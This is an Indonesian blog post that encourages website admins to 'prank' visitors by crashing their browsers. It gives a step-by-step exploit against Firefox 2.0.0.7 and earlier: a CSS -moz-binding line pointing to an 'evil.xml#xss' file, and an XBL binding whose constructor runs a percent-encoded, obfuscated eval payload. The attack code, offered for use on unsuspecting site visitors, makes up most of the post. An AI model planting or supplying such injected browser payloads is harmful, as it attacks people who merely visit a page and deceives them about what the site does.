Pengen ngerjai pengunjung? hehehe.. emangnya cuma pengunjung ajah yang bisa iseng, para admin jangan kalah iseng doong ;p Dengan beberapa script sederhana, anda bisa membuat Browser pengunjung anda mengalami crash. Target kita kali ini adalah para pengguna Mozilla Firefox V.2.0.0.7 kebawah.
Langkah 1
Salin script berikut dan letakkan diantara tag <HEAD> halaman situs anda:
<style>BODY{-moz-binding:url("evil.xml#xss")}</style>
Misalnya:
2 | < head >< style >BODY{-moz-binding:url("evil.xml#xss")}</ style > |
3 | < title >Judul halaman</ title > |
5 | < body >Isi halaman situs anda...</ body > |
Langkah 2
Salin script berikut, simpan dengan nama evil.xml dan uploadlah di directory yang sama dengan halaman yang disisipi script di langkah pertama tadi.
1 | <? xml version = "1.0" ?>< bindings xmlns = "http://www.mozilla.org/xbl" >< binding id = "xss" >< implementation >< constructor > <![CDATA[eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%61%3e%27%29')); ]]> </ constructor ></ implementation ></ binding ></ bindings > |
Cobalah akses halaman jebakan tadi menggunakan Mozilla Firefox V 2.0.0.7 kebawah. Browser anda akan mengalami Crash ^_^. Agar anda tidak mengalami nasib serupa, download ajah versi terbaru Mozilla Firefox.
Selamat mencoba..
0 komentar:
Posting Komentar